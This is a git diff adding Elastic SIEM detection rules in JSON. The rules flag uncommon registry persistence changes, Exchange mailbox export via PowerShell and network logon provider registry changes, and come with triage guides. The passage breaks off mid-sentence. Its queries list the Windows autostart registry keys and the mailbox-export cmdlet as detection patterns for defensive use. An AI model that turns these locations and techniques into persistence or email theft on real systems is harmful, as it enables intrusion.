\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", + "references": [ + "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "54902e45-3467-49a4-8abc-529f2c8cfb80", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + }, + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.002", + "name": "Screensaver", + "reference": "https://attack.mitre.org/techniques/T1546/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timeline_id": "3e47ef71-ebfc-4520-975c-cb27fc090799", + "timeline_title": "Comprehensive Registry Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "54902e45-3467-49a4-8abc-529f2c8cfb80_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_107.json b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_107.json new file mode 100644 index 00000000000..e5dbfc3bfd3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_107.json @@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects changes to registry persistence keys that are not commonly used or modified by legitimate programs. This could be an indication of an adversary's attempt to persist in a stealthy manner.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Uncommon Registry Persistence Change", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", + "references": [ + "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "54902e45-3467-49a4-8abc-529f2c8cfb80", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + }, + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.002", + "name": "Screensaver", + "reference": "https://attack.mitre.org/techniques/T1546/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timeline_id": "3e47ef71-ebfc-4520-975c-cb27fc090799", + "timeline_title": "Comprehensive Registry Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "54902e45-3467-49a4-8abc-529f2c8cfb80_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_108.json b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_108.json new file mode 100644 index 00000000000..ba1205854a6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_108.json @@ -0,0 +1,140 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information.", + "false_positives": [ + "Legitimate exchange system administration activity." + ], + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Exchange\\\\RemotePowerShell\\\\*" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\tmp_????????.???\\\\tmp_????????.???.ps?1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Windows\\\\TEMP\\\\tmp_????????.???\\\\tmp_????????.???.ps?1" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Exchange Mailbox Export via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Exchange Mailbox Export via PowerShell\n\nThe `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange.\nAttackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive and strategic data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the export operation:\n - Identify the user account that performed the action and whether it should perform this kind of action.\n - Contact the account owner and confirm whether they are aware of this activity.\n - Check if this operation was approved and performed according to the organization's change management policy.\n - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests.\n - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that assigned the \"Mailbox Import Export\" privilege for abnormal activity.\n- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on a per-mailbox basis and can be part of a mass export.\n- If the operation was completed successfully:\n - Check if the file is on the path specified in the command.\n - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and it is done with proper approval.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior.\n- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges of users with the \"Mailbox Import Export\" privilege to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : \"New-MailboxExportRequest\"\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps", + "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "54a81f68-5f2a-421e-8eed-f888278bb712", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + }, + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.001", + "name": "Local Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/001/" + }, + { + "id": "T1114.002", + "name": "Remote Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "54a81f68-5f2a-421e-8eed-f888278bb712_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_8.json b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_8.json new file mode 100644 index 00000000000..2d41733c615 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_8.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information.", + "false_positives": [ + "Legitimate exchange system administration activity." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Exchange Mailbox Export via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Exchange Mailbox Export via PowerShell\n\nThe `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange.\nAttackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive and strategic data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the export operation:\n - Identify the user account that performed the action and whether it should perform this kind of action.\n - Contact the account owner and confirm whether they are aware of this activity.\n - Check if this operation was approved and performed according to the organization's change management policy.\n - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests.\n - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that assigned the \"Mailbox Import Export\" privilege for abnormal activity.\n- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on a per-mailbox basis and can be part of a mass export.\n- If the operation was completed successfully:\n - Check if the file is on the path specified in the command.\n - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and it is done with proper approval.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior.\n- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges of users with the \"Mailbox Import Export\" privilege to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : \"New-MailboxExportRequest\" and\n not (\n file.path : (\n ?\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Microsoft\\\\\\\\Exchange\\\\\\\\RemotePowerShell\\\\\\\\* or\n ?\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\tmp_????????.???\\\\\\\\tmp_????????.???.ps?1* or\n ?\\:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\tmp_????????.???\\\\\\\\tmp_????????.???.ps?1*\n ) and file.name:(*.psd1 or *.psm1)\n )\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps", + "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "54a81f68-5f2a-421e-8eed-f888278bb712", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + }, + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.001", + "name": "Local Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/001/" + }, + { + "id": "T1114.002", + "name": "Remote Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 8 + }, + "id": "54a81f68-5f2a-421e-8eed-f888278bb712_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_108.json b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_108.json new file mode 100644 index 00000000000..075fd62321b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_108.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of the network logon provider registry. Adversaries may register a rogue network logon provider module for persistence and/or credential access via intercepting the authentication credentials in clear text during user logon.", + "false_positives": [ + "Authorized third party network logon providers." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Logon Provider Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Network Logon Provider Registry Modification\n\nNetwork logon providers are components in Windows responsible for handling the authentication process during a network logon.\n\nThis rule identifies the modification of the network logon provider registry. Adversaries may register a rogue network logon provider module for persistence and/or credential access via intercepting the authentication credentials in plain text during user logon.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Examine the `registry.data.strings` field to identify the DLL registered.\n- Identify the process responsible for the registry operation and the file creation and investigate their process execution chains (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n - Investigate any abnormal behavior by the subject process, such as network connections, DLLs loaded, registry or file modifications, and any spawned child processes.\n- Retrieve the file and examine if it is signed with valid digital signatures from vendors that are supposed to implement this kind of software and approved to use in the environment. Check for prevalence in the environment and whether they are located in expected locations.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executables of the processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- False Positives can include legitimate software installations or updates that modify the network logon provider registry. These modifications may be necessary for the proper functioning of the software and are not indicative of malicious activity.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the 